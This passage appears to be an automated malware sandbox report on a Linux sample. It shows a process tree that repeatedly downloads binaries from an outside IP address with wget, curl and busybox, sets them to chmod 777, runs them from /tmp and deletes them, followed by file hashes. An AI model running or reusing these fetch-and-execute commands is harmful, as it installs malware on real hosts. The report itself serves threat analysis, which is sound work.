/bin/busybox/bin/busybox wget http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵PID:1628
-
-
/bin/chmodchmod 777 X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- File and Directory Permissions Modification
PID:1629
-
-
/tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4./X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- Executes dropped EXE
PID:1630
-
-
/bin/rmrm X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵PID:1631
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵PID:1632
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- Writes file to tmp directory
PID:1633
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵PID:1634
-
-
/bin/chmodchmod 777 CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- File and Directory Permissions Modification
PID:1635
-
-
/tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW./CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- Executes dropped EXE
PID:1636
-
-
/bin/rmrm CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵PID:1637
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵PID:1638
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- Writes file to tmp directory
PID:1639
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵PID:1640
-
-
/bin/chmodchmod 777 vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- File and Directory Permissions Modification
PID:1641
-
-
/tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL./vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- Executes dropped EXE
PID:1642
-
-
/bin/rmrm vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵PID:1643
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:1644
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- Writes file to tmp directory
PID:1645
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:1646
-
-
/bin/chmodchmod 777 ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- File and Directory Permissions Modification
PID:1647
-
-
/tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0./ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- Executes dropped EXE
PID:1648
-
-
/bin/rmrm ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:1649
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵PID:1650
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- Writes file to tmp directory
PID:1651
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵PID:1652
-
-
/bin/chmodchmod 777 suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- File and Directory Permissions Modification
PID:1653
-
-
/tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD./suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- Executes dropped EXE
PID:1654
-
-
/bin/rmrm suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵PID:1655
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵PID:1656
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- Writes file to tmp directory
PID:1657
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵PID:1658
-
-
/bin/chmodchmod 777 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- File and Directory Permissions Modification
PID:1659
-
-
/tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA./3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- Executes dropped EXE
PID:1660
-
-
/bin/rmrm 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵PID:1661
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97